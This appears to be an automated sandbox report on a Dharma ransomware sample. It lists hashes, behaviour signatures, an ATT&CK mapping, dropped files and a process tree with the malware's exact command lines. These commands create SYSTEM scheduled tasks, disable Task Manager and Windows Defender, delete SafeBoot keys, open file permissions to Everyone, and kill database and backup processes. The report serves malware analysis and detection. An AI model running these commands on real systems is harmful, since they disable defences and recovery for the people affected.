Analysis

  • max time kernel
    198s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2023 03:21

General

  • Target

    VirusShare_5c36e305d926e55ef98d392176890cd2.exe

  • Size

    1.0MB

  • MD5

    5c36e305d926e55ef98d392176890cd2

  • SHA1

    64a15cdf89b6c8b85cba355b6944074614d810fd

  • SHA256

    5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

  • SHA512

    082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

  • SSDEEP

    24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM

Malware Config

Signatures

  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe
    "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:560
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      2⤵
      • Drops startup file
      PID:1520
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
      2⤵
        PID:520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:1484
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:1476
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:1932
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:1472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:988
        • C:\Windows\system32\attrib.exe
          attrib +h +s harma.exe
          3⤵
          • Views/modifies file attributes
          PID:1728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\harma.exe
          3⤵
          • Views/modifies file attributes
          PID:1612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1136
          • C:\Windows\system32\icacls.exe
            icacls * /grant Everyone:(OI)(CI)F /T /C /Q
            4⤵
            • Modifies file permissions
            PID:824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Windows\system32\cmd.exe
          cmd.exe /c taskkill /t /f /im sql*
          3⤵
            PID:1888
            • C:\Windows\system32\taskkill.exe
              taskkill /t /f /im sql*
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1556
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1276
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
          2⤵
            PID:1824
            • C:\Windows\system32\reg.exe
              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
              3⤵
                PID:556
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
              2⤵
                PID:1924
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
                2⤵
                  PID:1416
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
                  2⤵
                    PID:1604
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
                    2⤵
                      PID:364
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
                      2⤵
                        PID:1160
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        2⤵
                          PID:900
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            3⤵
                              PID:588
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            2⤵
                              PID:580
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:1592
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                2⤵
                                  PID:572
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    3⤵
                                      PID:1484
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:836
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1476

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Execution

                                    Scheduled Task

                                    1
                                    T1053

                                    Persistence

                                    Scheduled Task

                                    1
                                    T1053

                                    Hidden Files and Directories

                                    1
                                    T1158

                                    Privilege Escalation

                                    Scheduled Task

                                    1
                                    T1053

                                    Defense Evasion

                                    File Permissions Modification

                                    1
                                    T1222

                                    Hidden Files and Directories

                                    1
                                    T1158

                                    Discovery

                                    Query Registry

                                    2
                                    T1012

                                    Peripheral Device Discovery

                                    1
                                    T1120

                                    System Information Discovery

                                    2
                                    T1082

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\HRMPRIV
                                      Filesize

                                      2KB

                                      MD5

                                      98908523112d9d96bd2505f9b271b312

                                      SHA1

                                      766e63727220c64e1fe47c62714c9539dea2d844

                                      SHA256

                                      5970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488

                                      SHA512

                                      37168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e

                                    • C:\ProgramData\HRMPRIV
                                      Filesize

                                      2KB

                                      MD5

                                      98908523112d9d96bd2505f9b271b312

                                      SHA1

                                      766e63727220c64e1fe47c62714c9539dea2d844

                                      SHA256

                                      5970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488

                                      SHA512

                                      37168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e

                                    • C:\ProgramData\HRMPRIV
                                      Filesize

                                      2KB

                                      MD5

                                      98908523112d9d96bd2505f9b271b312

                                      SHA1

                                      766e63727220c64e1fe47c62714c9539dea2d844

                                      SHA256

                                      5970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488

                                      SHA512

                                      37168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e

                                    • C:\ProgramData\HRMPUB
                                      Filesize

                                      292B

                                      MD5

                                      c99815322ba0af6cbfd543820feec69c

                                      SHA1

                                      df0af0b72e1bfae989253b5f0c2ca33e5068e13f

                                      SHA256

                                      9ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647

                                      SHA512

                                      f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e

                                    • C:\ProgramData\HRMPUB
                                      Filesize

                                      292B

                                      MD5

                                      c99815322ba0af6cbfd543820feec69c

                                      SHA1

                                      df0af0b72e1bfae989253b5f0c2ca33e5068e13f

                                      SHA256

                                      9ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647

                                      SHA512

                                      f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e

                                    • C:\ProgramData\HRMPUB
                                      Filesize

                                      292B

                                      MD5

                                      c99815322ba0af6cbfd543820feec69c

                                      SHA1

                                      df0af0b72e1bfae989253b5f0c2ca33e5068e13f

                                      SHA256

                                      9ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647

                                      SHA512

                                      f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e

                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
                                      Filesize

                                      1.0MB

                                      MD5

                                      5c36e305d926e55ef98d392176890cd2

                                      SHA1

                                      64a15cdf89b6c8b85cba355b6944074614d810fd

                                      SHA256

                                      5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

                                      SHA512

                                      082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

                                    • C:\ProgramData\harma.exe
                                      Filesize

                                      1.0MB

                                      MD5

                                      5c36e305d926e55ef98d392176890cd2

                                      SHA1

                                      64a15cdf89b6c8b85cba355b6944074614d810fd

                                      SHA256

                                      5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

                                      SHA512

                                      082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

                                    • C:\ProgramData\id.harma
                                      Filesize

                                      8B

                                      MD5

                                      e2997224818aa8c8f4ea04513a210031

                                      SHA1

                                      1e9e1b8c32d9ac412d2512199fff5b6cef7fe113

                                      SHA256

                                      a16927d9b026dbfa0658cfacd90e5ebd2444484e931945c5e3562a6c01c95214

                                      SHA512

                                      96c86a59b2bd8ddb8be2296142f5a33a88ced9d43e7e76d5c217cacb89cda5bc3daea52bee156dccfb6a319632218f060b551da7c30bc3fdea018c6b2bc4bc4b

                                    • C:\Users\Admin\AppData\Local\Temp\HRMPRIV
                                      Filesize

                                      2KB

                                      MD5

                                      98908523112d9d96bd2505f9b271b312

                                      SHA1

                                      766e63727220c64e1fe47c62714c9539dea2d844

                                      SHA256

                                      5970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488

                                      SHA512

                                      37168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e

                                    • C:\Users\Admin\AppData\Local\Temp\HRMPUB
                                      Filesize

                                      292B

                                      MD5

                                      c99815322ba0af6cbfd543820feec69c

                                      SHA1

                                      df0af0b72e1bfae989253b5f0c2ca33e5068e13f

                                      SHA256

                                      9ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647

                                      SHA512

                                      f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e

                                    • C:\Users\Admin\AppData\Local\Temp\id.harma
                                      Filesize

                                      8B

                                      MD5

                                      e2997224818aa8c8f4ea04513a210031

                                      SHA1

                                      1e9e1b8c32d9ac412d2512199fff5b6cef7fe113

                                      SHA256

                                      a16927d9b026dbfa0658cfacd90e5ebd2444484e931945c5e3562a6c01c95214

                                      SHA512

                                      96c86a59b2bd8ddb8be2296142f5a33a88ced9d43e7e76d5c217cacb89cda5bc3daea52bee156dccfb6a319632218f060b551da7c30bc3fdea018c6b2bc4bc4b

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
                                      Filesize

                                      1.0MB

                                      MD5

                                      5c36e305d926e55ef98d392176890cd2

                                      SHA1

                                      64a15cdf89b6c8b85cba355b6944074614d810fd

                                      SHA256

                                      5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

                                      SHA512

                                      082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b